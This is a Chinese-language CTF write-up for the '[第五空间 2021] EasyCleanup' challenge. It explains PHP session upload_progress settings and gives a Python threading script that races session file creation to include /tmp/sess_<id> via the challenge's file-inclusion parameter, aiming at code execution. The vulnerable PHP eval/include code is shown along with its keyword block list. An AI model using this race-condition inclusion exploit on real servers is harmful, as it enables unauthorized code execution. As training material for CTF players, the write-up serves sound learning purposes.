从[第五空间 2021]EasyCleanup认识php_session

进入题目:源代码

 15 | filter($shell) | checkNums($shell)) exit("hacker"); 
    eval($shell); 
} 


if(isset($_GET['file'])){ 
    if(strlen($_GET['file']) > 15 | filter($_GET['file'])) exit("hacker"); 
    include $_GET['file']; 
} 


function filter($var){ 
    $banned = ["while", "for", "\$_", "include", "env", "require", "?", ":", "^", "+", "-", "%", "*", "`"]; 

    foreach($banned as $ban){ 
        if(strstr($var, $ban)) return True; 
    } 

    return False; 
} 

function checkNums($var){ 
    $alphanum = 'abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'; 
    $cnt = 0; 
    for($i = 0; $i < strlen($alphanum); $i++){ 
        for($j = 0; $j < strlen($var); $j++){ 
            if($var[$j] == $alphanum[$i]){ 
                $cnt += 1; 
                if($cnt > 8) return True; 
            } 
        } 
    } 
    return False; 
} 
?>

源代码中可以进行参数shell的文件执行,会参数file的文件包含,但是限制了字符,并且对a-z0-9A-Z进行了匹配,存在就exit(),要绕过这些匹配进行shell的rce执行,自己好像没有什么办法,先看看phpinfo()的内容。

从[第五空间 2021]EasyCleanup认识php_session_第1张图片

关键点在于:

1,session.save_handler	files	files
2,session.save_path	/tmp	/tmp
3,session.serialize_handler	php	php
4,session.upload_progress.cleanup	On	On
5,session.upload_progress.enabled	On	On
6,session.upload_progress.freq	1%	1%
7,session.upload_progress.min_freq	1	1
8,session.upload_progress.name	PHP_SESSION_UPLOAD_PROGRESS	PHP_SESSION_UPLOAD_PROGRESS
9,session.upload_progress.prefix	upload_progress_	upload_progress_
10,session.use_cookies	On	On
11,session.use_only_cookies	On	On
12,session.use_strict_mode	Off	Off

第一行表示session以文件的形式存储。

第二行表示session存储目录在/tmp下。

第三行表示反序列化和序列号的处理器是PHP。

第五行表示upload_progress功能启动,即浏览器向服务器上传文件时,php会把此次文件上传的详细信息存储在session中。

第四行表示文件上传结束后,php会立即清除对应session文件中的内容。

第六七行中的freq 和 min_freq 两项用来设置服务器端对进度信息的更新频率。合理的设置这两项可以减轻服务器的负担。

第八九行中的prefix 和 name 两项用来设置进度信息在session中存储的变量名/键名。

第十行表示使用cookie记录sessionid。

第十一行表示是否在客户端仅仅使用 cookie 来存放会话 ID。

第十二行中的值为off,表示Cookie中的sessionid可控。

解题思路:

当我们自己定义Cookie中的PAPSESSID时,PHP为在服务器创建文件并存储在tmp/sess_id。服务器会自动初始化Session,由(prefix+session.upload_progress.name)组成,由于十二行为off,可以自定义cookie存储session文件,然后控制文件的内容,进行file的文件包含,因为cleanup是开启的,所以需要使用条件竞争,在php为清除掉时,就访问临时tmp/sess_id文件包含进去。

即传输这样的内容:从[第五空间 2021]EasyCleanup认识php_session_第2张图片

 脚本:

import requests
import threading

myurl = 'http://1.14.71.254:28736/index.php'
sessid = '1a1'
writedata = {"PHP_SESSION_UPLOAD_PROGRESS": ""}
mycookie = {'PHPSESSID': sessid}
proxies = {
    "http": "127.0.0.1:8080",
}


def send_file(session):
    while True:
        resp = requests.post(url=myurl, data=writedata, files={'file': ('1.txt', 123)}, cookies=mycookie)

def getflag(session):
    while True:
        payload_url = myurl + '?file=' + '/tmp/sess_' +sessid
        resp = requests.get(url=payload_url)
        if 'upload_progress' in resp.text:
            print(resp.text)
            break


if __name__ == '__main__':
    session = requests.session()
    t = threading.Thread(target=send_file, args=(session,))
    t.start()
    getflag(session)
得到结果:

 

你可能感兴趣的:(php,web安全)